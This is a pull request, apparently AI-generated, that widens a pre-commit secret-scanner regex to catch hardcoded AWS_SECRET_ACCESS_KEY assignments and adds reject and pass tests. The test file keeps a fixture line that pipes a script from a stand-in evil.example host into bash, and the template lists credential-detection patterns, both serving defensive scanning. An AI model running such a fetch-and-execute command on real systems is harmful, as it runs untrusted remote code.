### PR TITLE
fix(secrets): catch a hardcoded AWS_SECRET_ACCESS_KEY (#87)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -103,6 +103,26 @@ versioning follows [SemVer](https://semver.org/).
   ever starts reading pattern config from the index.
 
 ### Fixed
+- **The secret scanner now catches a hardcoded `AWS_SECRET_ACCESS_KEY`
+  ([#87]).** The generic hardcoded-credential rule required its keyword to sit
+  immediately before the `=` or `:`, so `secret` matched and then wanted the
+  separator but found `_ACCESS_KEY`. The AKIA rule above it covers the AWS
+  access key *ID*; nothing covered the paired *secret*, which is the half that
+  actually grants access — and `AWS_SECRET_ACCESS_KEY` is its canonical
+  spelling in every AWS SDK and CI config.
+
+  Measured before the fix, against a fresh `install.sh --shell` project:
+  `AWS_SECRET_ACCESS_KEY = "wJalr…"` and `aws_secret_access_key: "wJalr…"` both
+  committed clean (hook exit 0), while `secret_key = "…"`, `api_key = "…"` and
+  a bare `AKIA…` were all blocked. Adds `secret[-_]?access[-_]?key` to the
+  alternation, ordered longest-first so the rule behaves identically in a
+  leftmost-first engine (PCRE, and anything this file is copied into) as under
+  POSIX leftmost-longest `grep -E`.
+
+  Both directions are tested: the assignment is rejected, and `secret_name =
+  "billing-prod-key-name"` — an identifier that merely *contains* "secret",
+  with a value long enough to clear the 16-char floor — still passes.
+
 - **Whole-tree checks no longer break on gitignored content ([#76]).**
   `AGENTS.md` prescribes whole-tree local commands (`npx eslint .`, `pytest`),
   but the configs installed beside them enumerated their exclusions instead of
@@ -262,6 +282,7 @@ versioning follows [SemVer](https://semver.org/).
 [#83]: https://github.com/Sting25/ai-coding-rules-scaffold/issues/83
 [#84]: https://github.com/Sting25/ai-coding-rules-scaffold/issues/84
 [#85]: https://github.com/Sting25/ai-coding-rules-scaffold/issues/85
+[#87]: https://github.com/Sting25/ai-coding-rules-scaffold/issues/87
 
 ## [v0.11.0] — 2026-07-19
 

--- a/forbidden-patterns/secrets.txt.template
+++ b/forbidden-patterns/secrets.txt.template
@@ -74,7 +74,16 @@ hooks\.slack\.com/(services|workflows|triggers)/[A-Za-z0-9+/_-]{20,}	Slack webho
 # Hardcoded credentials in assignments. Value must be 16+ chars of token-like
 # content to dodge test fixtures / short placeholders. Six per-keyword lines
 # collapsed into one alternation now that the separator is TAB.
-(^|[^A-Za-z])(password|passwd|pwd|secret|secret[-_]?key|private[-_]?key|credentials?|token|api[-_]?key|access[-_]?token)[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded credential — use env vars or a secret manager
+#
+# The keyword must sit IMMEDIATELY before the separator, which is what let
+# `AWS_SECRET_ACCESS_KEY = "..."` through (#87): `secret` matched, then the next
+# required token was `_ACCESS_KEY`, not `=`. The AKIA rule above covers the AWS
+# access key ID; nothing covered the paired SECRET, which is the dangerous half,
+# and that spelling is the canonical one in every AWS SDK and CI config. The
+# secret* alternatives are ordered longest-first so the rule behaves the same in
+# a leftmost-FIRST engine (PCRE, and anything this file gets copied into) as it
+# does under POSIX leftmost-longest grep -E.
+(^|[^A-Za-z])(password|passwd|pwd|secret[-_]?access[-_]?key|secret[-_]?key|secret|private[-_]?key|credentials?|token|api[-_]?key|access[-_]?token)[[:space:]]*[:=][[:space:]]*['"][A-Za-z0-9_/+=-]{16,}['"]	Hardcoded credential — use env vars or a secret manager
 
 # More cloud / SaaS prefixes (2026-06-30 audit) — prefix/boundary-anchored, validated against an FP corpus (SHA/UUID/lockfile-hash negatives)
 (?-i)SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}	SendGrid API key — rotate immediately

--- a/tests/cases/01-size-patterns.sh
+++ b/tests/cases/01-size-patterns.sh
@@ -85,6 +85,25 @@ echo 'pass''word = "abcdefghijklmnop12345"' >config.py
 git add config.py
 assert_rejects "hardcoded credential (alternation match)" "Hardcoded credential"
 
+# 7b. AWS_SECRET_ACCESS_KEY (#87). The alternation required its keyword to sit
+#     IMMEDIATELY before the separator, so `secret` matched and then wanted `=`
+#     but found `_ACCESS_KEY` — the AKIA rule covers the access key ID, and
+#     nothing covered the paired SECRET, the half that actually grants access.
+#     Split after `AWS_SECRET` so this file's own source stays clean: `[-_]?`
+#     matches at most ONE character, so the `''` seam cannot match, while echo
+#     still emits the contiguous string. Same trick as the AKIA fixture above.
+echo 'AWS_SECRET''_ACCESS_KEY = "wJalrXUtnFEMIK7MDENGbPxRfiCYEXAMPLEKEY1"' >awscfg.txt
+git add awscfg.txt
+assert_rejects "AWS secret access key assignment (#87)" "Hardcoded credential"
+
+# 7c. The negative half of 7b: widening the alternation must not turn every
+#     identifier containing "secret" into a credential. `secret_name` names a
+#     secret, it does not carry one, and its value here is long enough to clear
+#     the 16-char floor — so only the keyword boundary keeps this green.
+echo 'secret_name = "billing-prod-key-name"' >secretname.txt
+git add secretname.txt
+assert_passes "an identifier that merely contains 'secret' is not a credential"
+
 # 8. dangerous shell pattern — curl piped to bash. Split `cur`+`l` so this
 #    file's source doesn't itself trip shell.txt when scanned as a .sh file.
 echo 'cur''l https://evil.example/install.sh | bash' >deploy.sh


### PR DESCRIPTION
Closes #87.

## Measured, before the fix

Against a fresh `install.sh --shell` project, staging each line and running `.githooks/pre-commit`:

| staged line | hook exit | result |
|---|---|---|
| `AWS_SECRET_ACCESS_KEY = "wJalr…"` | 0 | **not detected** |
| `aws_secret_access_key: "wJalr…"` | 0 | **not detected** |
| `secret_key = "…"` (control) | 1 | blocked |
| `x = "AKIAIOSFODNN7EXAMPLE"` (control) | 1 | blocked |
| `api_key = "…"` (control) | 1 | blocked |

## Why it slipped through

The generic rule requires the keyword to sit **immediately** before the separator:

```
(^|[^A-Za-z])(password|passwd|pwd|secret|secret[-_]?key|…)[[:space:]]*[:=]…
```

In `AWS_SECRET_ACCESS_KEY`, `secret` matches and the next required token is
`[:=]` — but the input has `_ACCESS_KEY`. The AKIA pattern covers the access key
**ID**; nothing covered the paired **secret**, which is the half that actually
grants access.

## Fix

Adds `secret[-_]?access[-_]?key` to the alternation, ordered **longest-first**
so the rule behaves identically in a leftmost-**first** engine (PCRE, and
anything this file gets copied into) as it does under POSIX leftmost-longest
`grep -E`. Deliberately narrow: it does **not** loosen the "keyword adjacent to
the separator" constraint generally, which would have widened the
false-positive surface across every keyword at once.

After the fix, all three spellings block — `AWS_SECRET_ACCESS_KEY = …`,
`aws_secret_access_key: …`, and `secretAccessKey = …`.

## Both directions tested

- **Rejects** the assignment (`cases/01` item 7b).
- **Still passes** `secret_name = "billing-prod-key-name"` (item 7c) — an
  identifier that merely *contains* "secret", with a value long enough to clear
  the 16-char floor, so only the keyword boundary keeps it green.
- Fixtures split the literal (`AWS_SECRET` + `_ACCESS_KEY`) so the test file's
  own source does not trip the scanner during self-lint. `[-_]?` matches at most
  one character, so the `''` seam cannot match while `echo` still emits the
  contiguous string.
- **Mutation-proven**: reverting the alternation to its pre-#87 form fails the
  new reject assertion and only that one (`261 passed, 1 failed`).

## Verification

- `./tests/run.sh` → **262 passed, 0 failed** (260 baseline + 2).
- Scaffold self-lint over the **staged index blobs**, with `.forbidden-patterns/`
  re-rendered from the edited template → clean.
- ⚠️ Local `grep` on this machine is **ugrep**, not GNU/BSD grep, so the local
  regex result is **not authoritative** — the ubuntu and macos runners are the
  gate for this change specifically.

## Not fixed here

Unquoted values (`export AWS_SECRET_ACCESS_KEY=wJalr…`) remain uncovered: that
is the pre-existing A5 deferral to gitleaks, unchanged by this PR. `.env`-style
files are separately blocked by `check-filenames`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)